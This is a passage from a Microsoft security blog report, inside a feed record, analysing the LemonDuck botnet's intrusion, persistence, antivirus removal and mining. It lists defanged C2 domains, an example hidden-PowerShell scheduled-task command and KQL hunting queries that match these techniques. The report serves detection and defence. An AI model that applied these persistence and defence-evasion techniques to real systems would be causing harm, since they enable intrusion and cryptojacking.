much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-1.png)\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-2.png)\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN _(used for lateral movement and privilege escalation)\n * _KR.BIN _(used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-3.png)\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-4.png)\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-5.png)\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 